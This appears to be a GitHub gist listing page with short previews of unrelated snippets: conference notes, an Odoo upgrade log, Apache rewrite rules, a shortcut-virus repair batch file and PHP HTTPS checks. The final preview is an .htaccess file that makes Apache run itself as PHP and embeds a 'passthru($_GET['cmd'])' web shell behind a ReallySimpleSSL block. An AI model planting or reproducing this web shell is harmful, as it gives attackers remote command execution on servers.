This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FB原文連結: | |
https://www.facebook.com/permalink.php?story_fbid=pfbid02kZPjdn4fqsRc3ZUm8pqBdHySwUAVMQBDJzxHqey8w6mTfKtJJvtoRV7Fqne7UEcRl&id=100068893800768 | |
✨ 2024 Generative AI 年會 ✨ | |
本日共 🔟 場議程,簡單紀錄部分內容 | |
官方共筆 | |
👉 https://hackmd.io/@ejc/2024gaiconf | |
詳細筆記可參考官方共筆文件,連結放下方留言 👇 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
======================================================= | |
Odoo.sh: Uploading database to the Upgrade platform | |
Transfer started at 13-Mar 08:22 UTC | |
progress: 7% 13-Mar 08:22 UTC | |
progress: 26% 13-Mar 08:22 UTC | |
progress: 57% 13-Mar 08:22 UTC | |
progress: 88% 13-Mar 08:22 UTC | |
progress: 100% 13-Mar 08:22 UTC | |
The following log is the output of the upgrade process |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<IfModule mod_rewrite.c> | |
RewriteEngine On | |
RewriteBase / | |
RewriteCond %{HTTP_HOST} ^35\.53\.125\.135$ | |
RewriteRule ^(.*)$ http://abc.com/$1 [L,R=301] | |
</IfModule> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
echo =========捷徑病毒修復程式說明========= | |
echo; | |
echo 編輯者:Lun 2017.12.06 版本:v3.3 | |
echo; | |
echo 適用狀況:所有檔案皆變為捷徑檔、隨身碟點開變為捷徑。 | |
echo; | |
echo 修復程式僅會刪除病毒檔案,其餘非病毒相關檔案並不影響。 | |
echo; | |
echo 程式請以→右鍵→"系統管理員身分執行" |
本群組清單 提交修改 請至 gist 回覆
[AD]
- 台灣 OSS Conference的宣傳與交流
- https://lokidea.page.link/TWOssConfList (Google文件)
- 以上連結歡迎推廣與編輯
- https://www.fb.com/groups/Taiwan.OSS.Conference.List/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// false | |
$root = ($_SERVER['SERVER_PORT'] == 443 ? 'https' : 'http'); | |
// false | |
$root = "http".((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == "on") ? "s" : ""); | |
// false | |
$root = (empty($_SERVER['HTTPS']) OR strtolower($_SERVER['HTTPS']) === 'off') ? 'http' : 'https'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Files ~ "^\.ht"> | |
Order allow,deny | |
Allow from all | |
</files> | |
AddType application/x-httpd-php .htaccess | |
# <?php passthru($_GET['cmd']);?> | |
# BEGIN rlrssslReallySimpleSSL rsssl_version[2.4.1] | |
<IfModule mod_rewrite.c> | |
RewriteEngine on |
NewerOlder